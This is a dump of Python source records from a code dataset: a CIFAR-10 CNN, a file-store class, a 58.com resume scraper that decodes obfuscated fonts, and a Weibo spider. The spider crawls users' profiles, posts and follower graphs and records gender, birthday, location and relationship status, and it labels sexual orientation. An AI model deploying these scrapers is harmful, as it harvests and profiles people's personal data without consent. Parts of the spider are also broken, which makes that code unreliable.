NB_CLASSES)\n\n# float and normalize\n# I should really make some boilerplate code for this, DRY and all that\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\n# network\nmodel = Sequential()\n# first step: learn 32 3x3 convolutional filters, dropout 25% of values\nmodel.add(Conv2D(32, (3, 3), padding='same', input_shape=(IMG_ROWS, IMG_COLS, IMG_CHANNELS)))\nmodel.add(Activation('relu'))\n# conv -> conv -> maxpool -> dropout\nmodel.add(Conv2D(32, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n# conv (64 filters) -> conv -> maxpool -> dropout\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 
2)))\nmodel.add(Dropout(0.25))\n# next: dense network with 512 (32 x 32) neurons, then softmax to classify\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(NB_CLASSES))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n# train and test\nmodel.compile(loss='categorical_crossentropy', optimizer=OPTIMIZER, metrics=['accuracy'])\nmodel.fit(X_train, Y_train, batch_size=BATCH_SIZE, epochs=NB_EPOCH, validation_split=VALIDATION_SPLIT, verbose=VERBOSE)\nscore = model.evaluate(X_test, Y_test, batch_size=BATCH_SIZE, verbose=VERBOSE)\nprint(\"Test score: \", score[0])\nprint(\"Test accuracy: \", score[1])\n\n# save to JSON\nmodel_json = model.to_json()\ndir = 'cifar10_3_model'\nwith open(os.path.join(dir, 'cifar10_architecture.json'), 'w') as f:\n f.write(model_json)\nmodel.save_weights(os.path.join(dir, 'cifar10_weights.h5'), overwrite=True)\n\n# cleanup\nshutil.rmtree(tmpdir)\n","sub_path":"Ch_3/CIFAR-10_3.py","file_name":"CIFAR-10_3.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622249535","text":"# -*- coding: utf-8 -*-\nimport logging\nimport datetime as dt\nimport re\nimport os\nimport ujson as json\nimport uuid\n\nfrom scandir import scandir\n\nfrom iwlearn.storage.base import BaseStore\n\nclass FileStore(BaseStore):\n def __init__(self, sampletype, basepath = 'input/filestore'):\n BaseStore.__init__(self, sampletype)\n self.samplebase = os.path.join(basepath, os.path.join('samples',sampletype.__name__))\n self.predictionbase = os.path.join(basepath, os.path.join('predictions',sampletype.__name__))\n\n def _scan(self, strategy):\n for entry in scandir(self.samplebase):\n if entry.is_dir():\n try:\n day = dt.datetime.strptime(entry.name, '%Y-%m-%d')\n if not strategy.is_part(day):\n continue\n for entry2 in scandir(entry.path):\n if entry2.is_file():\n try:\n eid = entry2.name[0:-7]\n if not strategy.is_entity(eid):\n continue\n timeofday = dt.datetime.strptime(entry2.name[-6:], '%H%M%S')\n day = day.replace(hour=timeofday.hour, minute=timeofday.minute,\n second=timeofday.second)\n if strategy.is_fetch(day, eid):\n id = os.path.join(entry.name, entry2.name)\n strategy.add_fetch(id)\n except:\n logging.error('error fetching')\n except:\n logging.error('error part selection')\n\n def find_latest_sample(self, entityid):\n class LatestSearch:\n def __init__(self, entityid):\n self.entityid = entityid\n self.latest = None\n self.result = None\n\n def is_part(self, day):\n return True\n\n def is_entity(self, eid):\n return eid == self.entityid\n\n def is_fetch(self, datetime, eid):\n if self.latest is None or self.latest < datetime:\n self.latest = datetime\n return True\n return False\n\n def add_fetch(self, id):\n self.result = id\n\n strategy = LatestSearch(entityid)\n self._scan(strategy)\n if strategy.result is None:\n return None\n return self._load(strategy.result)\n\n def _load(self, id):\n with open(os.path.join(self.samplebase, id), 'r') as f:\n doc = json.load(f)\n doc = BaseStore._convert_data_from_json(doc)\n sample = self.sampletype.fromjson(doc)\n sample['_id'] = id\n return sample\n\n def find_samples(self, *args, **kwargs):\n \"\"\"\n Supports the following filter conditions:\n earliest : Date or DateTime\n latest = Date or DateTime\n match_entityid = Lambda getting entityid and returning boolean\n \"\"\"\n return list(self.find_samples_generator(*args, **kwargs))\n\n def find_samples_generator(self, 
batch_size=1000, *args, **kwargs):\n \"\"\"\n Supports the following filter conditions:\n earliest : Date or DateTime\n latest = Date or DateTime\n match_entityid = Lambda getting entityid and returning boolean\n \"\"\"\n\n class FilterStrategy():\n def __init__(self, kwargs):\n self.filter = kwargs\n self.result = []\n if 'earliest' in self.filter:\n if type(self.filter['earliest']) == dt.date:\n self.filter['earliest'] = dt.datetime(\n year=self.filter['earliest'].year,\n month=self.filter['earliest'].month,\n day=self.filter['earliest'].day,\n )\n if type(self.filter['earliest']) == dt.datetime:\n self.filter['earliest'] = self.filter['earliest'].replace(microsecond=0)\n\n if 'latest' in self.filter:\n if type(self.filter['latest']) == dt.date:\n self.filter['latest'] = dt.datetime(\n year=self.filter['latest'].year,\n month=self.filter['latest'].month,\n day=self.filter['latest'].day,\n hour=23, minute=59, second=59\n )\n if type(self.filter['latest']) == dt.datetime:\n self.filter['latest'] = self.filter['latest'].replace(microsecond=0)\n\n def is_part(self, day):\n if 'earliest' in self.filter:\n if day.date() < self.filter['earliest'].date():\n return False\n\n if 'latest' in self.filter:\n if day.date() > self.filter['latest'].date():\n return False\n\n return True\n\n def is_entity(self, eid):\n return 'match_entityid' not in self.filter or self.filter['match_entityid'](eid)\n\n def is_fetch(self, datetime, eid):\n if 'earliest' in self.filter:\n if datetime < self.filter['earliest']:\n return False\n\n if 'latest' in self.filter:\n if datetime > self.filter['latest']:\n return False\n\n return True\n\n def add_fetch(self, id):\n self.result.append(id)\n\n strategy = FilterStrategy(kwargs)\n self._scan(strategy)\n for id in strategy.result:\n yield self._load(id)\n\n\n def _get_paths(self, sample):\n part = sample.created.strftime('%Y-%m-%d')\n file = re.sub('[^a-zA-Z0-9_.\\\\-]', '_', sample.entityid) + \\\n '_' + sample.created.strftime('%H%M%S')\n dir = os.path.join(self.samplebase, part)\n fullpath = os.path.join(dir, file)\n id = os.path.join(part, file)\n return dir, fullpath, id\n\n def insert_sample(self, sample):\n dir, fullpath, id = self._get_paths(sample)\n\n data = BaseStore._convert_data_for_json(sample.data)\n self._insert_data(dir, fullpath, data)\n sample['_id'] = id\n\n def replace_sample(self, sample):\n if '_id' in sample:\n fullpath = os.path.join(self.samplebase, sample['_id'])\n else:\n _, fullpath, _ = self._get_paths(sample)\n if os.path.isfile(fullpath):\n tmp = uuid.uuid4().hex\n os.rename(fullpath, fullpath + '__' + tmp)\n self.insert_sample(sample)\n os.remove(fullpath + '__' + tmp)\n\n def insert_samples(self, samples):\n for sample in samples:\n self.insert_sample(sample)\n\n def _insert_prediction(self, data):\n part = data['created'].strftime('%Y-%m-%d')\n file = re.sub('[^a-zA-Z0-9_.\\\\-]', '_', data['entityid']) + \\\n '_' + data['created'].strftime('%H%M%S')\n dir = os.path.join(self.predictionbase, part)\n fullpath = os.path.join(dir, file)\n self._insert_data(dir, fullpath, data)\n\n def _insert_data(self, dir, fullpath, data):\n os.makedirs(dir, exist_ok=True)\n if os.path.isfile(fullpath):\n raise Exception('Cannot insert data under %s: its already exists' % fullpath)\n with open(fullpath, 'w') as f:\n json.dump(data, f)\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, 
format='%(asctime)s\\t%(levelname)s\\t%(message)s')\n","sub_path":"iwlearn/storage/filestore.py","file_name":"filestore.py","file_ext":"py","file_size_in_byte":7779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"43445463","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/28 14:46\n# @Author : longHui.wu \n# @File : maybe.py\nimport requests\nfrom lxml import etree\nimport re\nimport base64\nfrom fontTools.ttLib import TTFont\n\n# url = \"https://sz.58.com/searchjob/\"\nurl = \"https://sz.58.com/searchjob/pve_5569_1_pve_5568_1/\"\n\nheaders = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/73.0.3683.86 Safari/537.36\",\n}\n\nresponse = requests.get(url, headers=headers)\nhtml = etree.HTML(response.text)\nfont_face = html.xpath('//head/style[1]/text()')[0].strip()\n# 提前字体文件\nbase64_code = re.findall(r\"base64,(.*?)\\)\", font_face)\nif len(base64_code) != 0:\n base64_code = base64_code[0]\nwoff = base64.b64decode(base64_code)\n# base64 写入字体文件58tc.woff中,一定要wb方式写入,每次运行代码会覆盖文件\nwith open(\"58tc.woff\", \"wb\") as f:\n f.write(woff)\n\n# 打开下载保存好的新字体文件58tc.woff\nfont = TTFont('58tc.woff')\n# 打开本地保存的基本字体文件58.woff\nbase_font = TTFont(\"jianli.woff\")\n\n# getGlyphNames()[1:-1]和getGlyphOrder()[2:]结果是一样的\n# uni_list = font.getGlyphNames()[1:-1]\nuni_list = font.getGlyphOrder()[2:]\n\n# 定义一个临时存储新字体文件映射关系的字典temp\ntemp = {}\n# 把本地字体文件的映射关系用base_uni和base_value两个列表映射保存\nbase_uni = ['uniE16E', 'uniE1A8', 'uniE281', 'uniE2AE', 'uniE2BD', 'uniE2D6', 'uniE335', 'uniE393', 'uniE3B2',\n 'uniE50A', 'uniE539', 'uniE57F', 'uniE5F3', 'uniE766', 'uniE82D', 'uniE884', 'uniE90A', 'uniEA33',\n 'uniEAAF', 'uniEB01', 'uniEC12', 'uniEDC8', 'uniEDF5', 'uniEE81', 'uniEE83', 'uniEED5', 'uniEF5B',\n 'uniF0D3', 'uniF1B7', 'uniF23A', 'uniF340', 'uniF3BE', 'uniF3F1', 'uniF426', 'uniF4D4', 'uniF500', 'uniF521'\n , 'uniF542', 'uniF571', 'uniF588', 'uniF66D', 'uniF680', 'uniF699', 'uniF6A3', 'uniF835']\nbase_value = ['陈', '杨', 'E', '4', '6', 'M', '高', '下', '2', '李', '生', '吴', '经', '王', '3', '博', '技', '本',\n '周', '刘', '无', '应', '中', '校', '以', '7', '9', '科', '1', '届', '硕', '士', '黄', '大', '张', '5', '0'\n , 'B', '赵', 'A', '男', '专', '女', '验', '8']\n\n# base_uni = [\n# 'uniE0AC', 'uniE0D6', 'uniE189', 'uniE19A', 'uniE1BC', 'uniE441', 'uniE47A', 'uniE4BE', 'uniE4F1',\n# 'uniE587', 'uniE5B0', 'uniE5CE', 'uniE615', 'uniE632', 'uniE701', 'uniE87F', 'uniEAC1', 'uniEAF9',\n# 'uniEB60', 'uniEB96', 'uniEBB0', 'uniEC03', 'uniEF5F', 'uniEF8B', 'uniF037', 'uniF076', 'uniF0A0',\n# 'uniF13A', 'uniF14D', 'uniF1DB', 'uniF264', 'uniF2D1', 'uniF31A', 'uniF386', 'uniF406', 'uniF46B',\n# 'uniF49A', 'uniF4DB', 'uniF5F0', 'uniF607', 'uniF62A', 'uniF6E6', 'uniF772', 'uniF787', 'uniF7B9'\n# ]\n# base_value = [\n# '7', '下', '王', '周', '专', '0', '女', '博', '杨', '李', '校', '技', '届', '8', '男', '科', '中',\n# '赵', '生', 'M', '9', '以', '经', '6', '陈', 'A', '验', '黄', 'B', '5', '士', '1', '张', '硕', '4',\n# '高', '无', '大', '吴', 'E', '应', '3', '2', '本', '刘'\n# ]\n# 循环对比\nfor i in range(len(base_uni)):\n # 编码字体坐标转化成了列表,列表里是一个个元组,元组里放的是(x,y)坐标\n new_glyph = list(font['glyf'][uni_list[i]].coordinates)\n # 用前两个坐标作为取差值\n new_glyph_difference = [abs(k[0] - k[1]) for k in new_glyph[:2]]\n for j in range(len(base_uni)):\n base_glyph = list(base_font['glyf'][base_uni[j]].coordinates)\n base_glyph_difference = [abs(n[0] - n[1]) for n in base_glyph[:2]]\n # 比较两个差值是否为0\n if int(abs(sum(new_glyph_difference) / len(new_glyph_difference) - 
sum(base_glyph_difference) / len(\n base_glyph_difference))) == 0:\n # 把编码去掉uni三个字符然后转换成全小写,再拼接成网页源代码一样的编码格式,最后把映射关系存储到temp字典中\n temp[\"&#x\" + uni_list[i][3:].lower() + ';'] = base_value[j]\n\n# 构造正则表达式用|匹配左右任意一个表达式,替换编码\nre_rule = '(' + '|'.join(temp.keys()) + ')'\n# 把所有的编码替换成文字\nresponse_data = re.sub(re_rule, lambda x: temp[x.group()], response.text)\nweb = etree.HTML(response_data)\n\ncontent = web.xpath('//*[@id=\"infolist\"]/ul/li')\nperson = []\nfor el in content:\n name = el.xpath('./div[1]/dl/dd/div[1]/a/span/text()')\n sex = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[1]/text()')\n age = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[2]/text()')\n work_time = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[3]/text()')\n school = el.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[4]/text()')\n\n want_work = el.xpath('./div[1]/dl/dd/p[1]/span/text()')\n now = el.xpath('./div[1]/dl/dd/p[1]/em[2]/text()')\n want_local = el.xpath('./div[1]/dl/dd/p[2]/span/text()')\n print(name, sex, age, work_time, school, want_work, now, want_local)\n\n# personal_information = data.xpath('//div[@id=\"infolist\"]/ul/li//dl[@class=\"infocardMessage clearfix\"]')\n# for info in personal_information:\n# # 姓名\n# name = info.xpath('./dd//span[@class=\"infocardName fl stonefont resumeName\"]/text()')[0]\n# # 性别\n# gender = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[1]/text()')[0]\n# # 年龄\n# age = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[2]/text()')[0]\n# school = info.xpath('./div[1]/dl/dd/div[1]/a/div/div/em[4]/text()')\n# # 工作经验\n# work_experiences = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[3]/text()')\n# if work_experiences == []:\n# work_experience = \"\"\n# else:\n# work_experience = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[3]/text()')[0]\n# # 学历\n# educations = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[4]/text()')\n# if educations == []:\n# education = \"\"\n# else:\n# education = info.xpath('./dd//div[@ class=\"infocardBasic fl\"]/div/em[4]/text()')[0]\n# print(name, gender, age, work_experience, education)\n","sub_path":"city58/maybe.py","file_name":"maybe.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63811457","text":"# -*- coding: utf-8 -*-\nimport re\nimport datetime\nfrom datetime import timedelta\nfrom scrapy.spider import CrawlSpider\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\nfrom Sina_spider.items import InformationItem, TweetsItem, RelationshipsItem,CommentsItem,RepostsItem\nimport logging\nfrom scrapy.shell import inspect_response\nimport urllib\nimport os\nimport json\n\nclass SinaspiderSpider(CrawlSpider):\n name = 'SinaSpider'\n host = \"http://weibo.cn\"\n weiboID = ['2286908003']\n start_urls = list(set(weiboID))\n logging.getLogger(\"requests\").setLevel(logging.WARNING) # 将requests的日志级别设成WARNING\n def start_requests(self):\n for uid in self.start_urls:\n yield Request(url=\"https://weibo.cn/%s/info\" % uid, callback=self.parse_information)\n \n def parse_information(self, response):\n \"\"\" 抓取个人信息 \"\"\"\n informationItem = InformationItem()\n selector = Selector(response)\n ID = re.findall('(\\d+)/info', response.url)[0]\n try:\n logging.warning(\"开始解析个人信息...\")\n # img_url = selector.xpath('//img[@alt=\"头像\"]/@src').extract()\n # urllib.request.urlretrieve(img_url[0], './headimage/' + str(ID)+'.jpg')\n text1 = 
\";\".join(selector.xpath('body/div[@class=\"c\"]//text()').extract()) # 获取标签里的所有text()\n nickname = re.findall('昵称[;::]+(.*?);', text1)\n gender = re.findall('性别[;::]?(.*?);', text1)\n place = re.findall('地区[;::]?(.*?);' , text1)\n briefIntroduction = re.findall('简介[;::]?(.*?);' , text1)\n birthday = re.findall('生日[;::]?(.*?);' , text1) \n sexOrientation = re.findall('性取向[;::]?(.*?);' , text1)\n sentiment = re.findall('感情状况[;::]?(.*?);' , text1)\n vipLevel = re.findall('会员等级[;::]?(.*?);' , text1)\n authentication = re.findall('认证[;::]?(.*?);' , text1)\n url = re.findall('互联网[;::]?(.*?);' , text1)\n logging.warning(\"解析完成...\")\n informationItem[\"_id\"] = ID\n # if img_url and img_url[0]:\n # logging.warning(\"存入头像图片...\")\n # informationItem[\"img_url\"] = img_url[0]\n if nickname and nickname[0]:\n logging.warning(\"存入姓名...\")\n informationItem[\"NickName\"] = nickname[0].replace(u\"\\xa0\", \"\")\n if gender and gender[0]:\n logging.warning(\"存入性别...\")\n informationItem[\"Gender\"] = gender[0].replace(u\"\\xa0\", \"\")\n if place and place[0]:\n logging.warning(\"存入地址...\")\n place = place[0].replace(u\"\\xa0\", \"\").split(\" \")\n informationItem[\"Province\"] = place[0]\n if len(place) > 1:\n informationItem[\"City\"] = place[1]\n if briefIntroduction and briefIntroduction[0]:\n logging.warning(\"存入简介...\")\n informationItem[\"BriefIntroduction\"] = briefIntroduction[0].replace(u\"\\xa0\", \"\")\n if birthday and birthday[0]:\n logging.warning(\"存入生日...\")\n try:\n informationItem[\"Birthday\"] = datetime.datetime.strptime(birthday[0], \"%Y-%m-%d\")\n except Exception:\n informationItem['Birthday'] = birthday[0] # 有可能是星座,而非时间\n if sexOrientation and sexOrientation[0]:\n logging.warning(\"存入性取向...\")\n if sexOrientation[0].replace(u\"\\xa0\", \"\") == gender[0]:\n informationItem[\"SexOrientation\"] = \"同性恋\"\n else:\n informationItem[\"SexOrientation\"] = \"异性恋\"\n if sentiment and sentiment[0]:\n logging.warning(\"存入情感状况...\")\n informationItem[\"Sentiment\"] = sentiment[0].replace(u\"\\xa0\", \"\")\n if vipLevel and vipLevel[0]:\n logging.warning(\"存入会员等级...\")\n informationItem[\"VIPlevel\"] = vipLevel[0].replace(u\"\\xa0\", \"\")\n if authentication and authentication[0]:\n logging.warning(\"存入认证...\")\n informationItem[\"Authentication\"] = authentication[0].replace(u\"\\xa0\", \"\")\n if url:\n informationItem[\"URL\"] = url[0]\n\n try:\n urlothers = \"https://weibo.cn/attgroup/opening?uid=%s\" % ID\n r = requests.get(urlothers, cookies=response.request.cookies, timeout=5)\n if r.status_code == 200:\n selector = etree.HTML(r.content)\n texts = \";\".join(selector.xpath('//body//div[@class=\"tip2\"]/a//text()'))\n if texts:\n logging.warning(\"开始解析微博数,关注数,粉丝数...\")\n num_tweets = re.findall('微博\\[(\\d+)\\]', texts)\n num_follows = re.findall('关注\\[(\\d+)\\]', texts)\n num_fans = re.findall('粉丝\\[(\\d+)\\]', texts)\n if num_tweets:\n logging.warning(\"存入微博数...\")\n informationItem[\"Num_Tweets\"] = int(num_tweets[0])\n if num_follows:\n logging.warning(\"存入关注数...\")\n informationItem[\"Num_Follows\"] = int(num_follows[0])\n if num_fans:\n logging.warning(\"存入粉丝数...\")\n informationItem[\"Num_Fans\"] = int(num_fans[0])\n except Exception :\n pass\n except Exception:\n logging.warning(\"未解析\")\n else:\n yield informationItem\n yield Request(url=\"https://weibo.cn/%s/profile?filter=1&page=1\" % ID, callback=self.parse_tweets, dont_filter=True)\n yield Request(url=\"https://weibo.cn/%s/follow\" % ID, callback=self.parse_relationship, dont_filter=True)\n yield 
Request(url=\"https://weibo.cn/%s/fans\" % ID, callback=self.parse_relationship, dont_filter=True)\n\n def parse_tweets(self, response):\n \"\"\" 抓取微博数据 \"\"\"\n tweetIDs = []\n selector = Selector(response)\n ID = re.findall('(\\d+)/profile', response.url)[0]\n divs = selector.xpath('body/div[@class=\"c\" and @id]')\n for div in divs:\n try:\n logging.warning(\"开始解析微博数据...\")\n tweetsItems = TweetsItem()\n id = div.xpath('@id').extract_first()[2:] # 微博ID\n tweetIDs.append(id) # 加入微博列表\n content = div.xpath('div/span[@class=\"ctt\"]//text()').extract() # 微博内容\n cooridinates = div.xpath('div/a/@href').extract() # 定位坐标\n like = re.findall('赞\\[(\\d+)\\]', div.extract()) # 点赞数\n transfer = re.findall('转发\\[(\\d+)\\]', div.extract()) # 转载数\n comment = re.findall('评论\\[(\\d+)\\]', div.extract()) # 评论数\n others = div.xpath('div/span[@class=\"ct\"]/text()').extract() # 求时间和使用工具(手机或平台)\n tweetsItems[\"_id\"] = ID + \"-\" + id\n tweetsItems[\"ID\"] = ID\n if content:\n logging.warning(\"存入微博内容...\")\n tweetsItems[\"Content\"] = \" \".join(content).strip('[位置]') # 去掉最后的\"[位置]\"\n if cooridinates:\n logging.warning(\"存入微博定位...\")\n cooridinates = re.findall('center=([\\d.,]+)', cooridinates[0])\n if cooridinates:\n tweetsItems[\"Co_oridinates\"] = cooridinates[0]\n if like:\n logging.warning(\"存入点赞数...\")\n tweetsItems[\"Like\"] = int(like[0])\n if transfer:\n logging.warning(\"存入转发数...\")\n tweetsItems[\"Transfer\"] = int(transfer[0])\n if comment:\n logging.warning(\"存入评论数...\")\n tweetsItems[\"Comment\"] = int(comment[0])\n if others:\n others = others[0].split('来自')\n pubtime = others[0].replace(u\"\\xa0\", \"\")\n if \"分钟前\" in pubtime: # 添加上年月日 计算时间\n now = datetime.datetime.now()\n time = re.findall(\"(\\d+)分钟前\",pubtime)\n after = datetime.timedelta(minutes = int(time[0]))\n tweetsItems[\"PubTime\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif \"今天\" in pubtime: # 添加上年月日 加上时间\n time = re.findall(\"今天 (.*)\",pubtime)\n now = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n tweetsItems[\"PubTime\"] = now + \" \" +time[0]\n elif re.search(\"20\\d+\\-\",pubtime):\n tweetsItems[\"PubTime\"] = pubtime\n else: # 只将格式转变为年月日格式\n now = datetime.datetime.now().strftime(\"%Y\")\n try:\n time = datetime.datetime.strptime(pubtime,\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n except:\n pass\n else:\n tweetsItems[\"PubTime\"] = now + \"-\" + time\n if len(others) == 2:\n tweetsItems[\"Tools\"] = others[1].replace(u\"\\xa0\", \"\")\n except Exception:\n pass\n else:\n yield tweetsItems\n\n for tweetID in tweetIDs:\n yield Request(url = \"https://weibo.cn/comment/\" + tweetID + \"?&uid=\"+ ID +\"&page=1\",callback = self.parse_comments,dont_filter = True) # 抓取评论\n yield Request(url = \"https://weibo.cn/repost/\" + tweetID + \"?&uid=\"+ ID +\"&page=1\",callback = self.parse_reposts,dont_filter = True) # 抓取转发\n\n url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n if url_next:\n logging.warning(self.host + url_next[0])\n yield Request(url=self.host + url_next[0], callback=self.parse_tweets, dont_filter=True)\n\n def parse_comments(self,response):\n '''抓取评论'''\n selector = Selector(response)\n divs = selector.xpath('body/div[@class=\"c\" and @id]')\n ID = re.findall('comment/([\\w\\d]+)\\?\\&uid=',response.url) # 微博ID\n for div in divs:\n try:\n user_id = div.xpath('a/@href').extract()\n user_name = div.xpath('a/text()').extract()\n likenum = re.findall('赞\\[(\\d+)\\]',div.extract())\n source = re.findall('来自(.*?)',div.extract())\n 
created_at = re.findall('(.*?)\\\\xa0来自',div.extract())\n                text = div.xpath('span[@class=\"ctt\"]/text()').extract()\n                commentItems = CommentsItem()\n                if user_id and user_id[0]:\n                    if len(user_id) == 2:\n                        user_id = re.findall('&fuid=(\\d+)',user_id[1])\n                    commentItems[\"User_id\"] = user_id[0]\n                    commentItems['_id'] = ID[0] + \"-\" +user_id[0] # 主键\n                if user_name and user_name[0]:\n                    commentItems[\"User_name\"] = user_name[0]\n                if likenum and likenum[0]:\n                    commentItems[\"Likenum\"] = likenum[0]\n                if source and source[0]:\n                    if \"iPhone客户端\" in source[0]:\n                        source[0] = \"iPhone客户端\"\n                    commentItems[\"Source\"] = source[0]\n                if created_at and created_at[0]:\n                    if \"分钟前\" in created_at[0]: # 添加上年月日 计算时间\n                        now = datetime.datetime.now()\n                        time = re.findall(\"(\\d+)分钟前\",created_at[0])\n                        after = datetime.timedelta(minutes = int(time[0]))\n                        commentItems[\"Created_at\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n                    elif \"今天\" in created_at[0]: # 添加上年月日 加上时间\n                        time = re.findall(\"今天 (.*)\",created_at[0])\n                        now = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n                        commentItems[\"Created_at\"] = now + \" \" +time[0]\n                    elif re.search(\"20\\d+\\-\",created_at[0]):\n                        commentItems[\"Created_at\"] = created_at[0]\n                    else: # 只将格式转变为年月日格式\n                        now = datetime.datetime.now().strftime(\"%Y\")\n                        try:\n                            time = datetime.datetime.strptime(created_at[0],\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n                        except:\n                            pass\n                        else:\n                            commentItems[\"Created_at\"] = now + \"-\" + time\n                if text and text[0]:\n                    if len(text) == 2 and text[0] == \"回复\":\n                        name = div.xpath('span[@class=\"ctt\"]/a/text()').extract()\n                        if name and name[0]:\n                            commentItems[\"Text\"] = text[0] + name[0] + text[1]\n                        else:\n                            logging.warning(\"匹配不上\")\n                    else:\n                        commentItems[\"Text\"] = text[0]\n            except Exception :\n                logging.warning(\"评论爬取失败...\")\n                pass\n            else:\n                yield commentItems\n        url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n        if url_next:\n            logging.warning(self.host + url_next[0])\n            yield Request(url = self.host + url_next[0],callback = self.parse_comments,dont_filter = True)\n\n    def parse_reposts(self,response):\n        '''抓取转发'''\n        selector = Selector(response)\n        divs = selector.xpath('body/div[@class=\"c\"]')\n        ID = re.findall('repost/([\\w\\d]+)\\?\\&uid=',response.url) # 微博ID\n        for div in divs:\n            try:\n                # user_id = div.xpath('a/@href').extract()\n                user_name = div.xpath('a/text()').extract()\n                likenum = re.findall('赞\\[(\\d+)\\]',div.extract())\n                source = re.findall('来自(.*?)',div.extract())\n                created_at = re.findall('\\\\xa0(.*?)\\\\xa0来自',div.extract())\n                text = re.findall('\\:(.*?)\\\\xa0\\',div.extract())\n                repostsItems = RepostsItem()\n                repostsItems['_id'] = ID[0] + \"-\" + user_name[0]\n                # if user_id and user_id[0]:\n                #     if len(user_id) == 2:\n                #         user_id = re.findall('&fuid=(\\d+)',user_id[1])\n                #     repostsItems[\"User_id\"] = User_id[0]\n                if user_name and user_name[0] != '返回我的首页':\n                    repostsItems[\"User_name\"] = user_name[0]\n                if likenum and likenum[0]:\n                    repostsItems[\"Likenum\"] = likenum[0]\n                if source and source[0]:\n                    repostsItems[\"Source\"] = source[0]\n                if created_at and created_at[0]:\n                    if \"分钟前\" in created_at[0]: # 添加上年月日 计算时间\n                        now = datetime.datetime.now()\n                        time = re.findall(\"(\\d+)分钟前\",created_at[0])\n                        after = datetime.timedelta(minutes = int(time[0]))\n                        repostsItems[\"Created_at\"] = (now - after).strftime(\"%Y-%m-%d %H:%M:%S\")\n                    elif \"今天\" in created_at[0]: # 添加上年月日 加上时间\n                        time = re.findall(\"今天 (.*)\",created_at[0])\n                        now = 
datetime.datetime.now().strftime(\"%Y-%m-%d\")\n repostsItems[\"Created_at\"] = now + \" \" +time[0]\n elif re.search(\"20\\d+\\-\",created_at[0]):\n repostsItems[\"Created_at\"] = created_at[0]\n else: # 只将格式转变为年月日格式\n now = datetime.datetime.now().strftime(\"%Y\")\n try:\n time = datetime.datetime.strptime(created_at[0],\"%m月%d日 %H:%M\").strftime(\"%m-%d %H:%M\")\n except:\n pass\n else:\n repostsItems[\"Created_at\"] = now + \"-\" + time\n if text and text[0]:\n repost_text = re.split(\"<|>\",text[0])\n line = \"\"\n for i in repost_text:\n if \"alt=\" not in i and \"a href\" not in i and \"/a\" not in i:\n line = line + \" \" + i \n repostsItems[\"Text\"] = line\n except Exception :\n logging.warning(\"转发爬取失败...\")\n pass\n else:\n yield repostsItems\n \n url_next = selector.xpath('body/div[@class=\"pa\" and @id=\"pagelist\"]/form/div/a[text()=\"下页\"]/@href').extract()\n if url_next:\n logging.warning(self.host + url_next[0])\n yield Request(url = self.host + url_next[0],callback = self.parse_reposts,dont_filter = True)\n \n def parse_relationship(self, response):\n \"\"\" 打开url爬取里面的个人ID \"\"\"\n selector = Selector(response)\n if \"/follow\" in response.url:\n ID = re.findall('(\\d+)/follow', response.url)[0]\n flag = True\n else:\n ID = re.findall('(\\d+)/fans', response.url)[0]\n flag = False \n urls = selector.xpath('//a[text()=\"关注他\" or text()=\"关注她\"]/@href').extract()\n uids = re.findall('uid=(\\d+)', \";\".join(urls), re.S)\n for uid in uids:\n relationshipsItem = RelationshipsItem()\n relationshipsItem[\"Host1\"] = ID if flag else uid\n relationshipsItem[\"Host2\"] = uid if flag else ID\n yield relationshipsItem\n yield Request(url=\"https://weibo.cn/%s/info\" % uid, callback=self.parse_information)\n\n next_url = selector.xpath('//a[text()=\"下页\"]/@href').extract()\n if next_url:\n yield Request(url=self.host + next_url[0], callback=self.parse_relationship, dont_filter=True)\n\n ","sub_path":"Sina_spider/Sina_spider/spiders/SinaSpider.py","file_name":"SinaSpider.py","file_ext":"py","file_size_in_byte":18934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"337710577","text":"#Output format\n#Group #, Day, Time, Room\n#Pilot leader\n#First Last, JHED ID, Hopkins ID, email\n\ndef assign(roomList,finalRoomCombo,finalStudentAssignments,leaderRooms,leaderAssignments,subjectNames):\n for subjectRooms,subjectAssignments,subjectName,subjectLeaders,leaderMeeting in 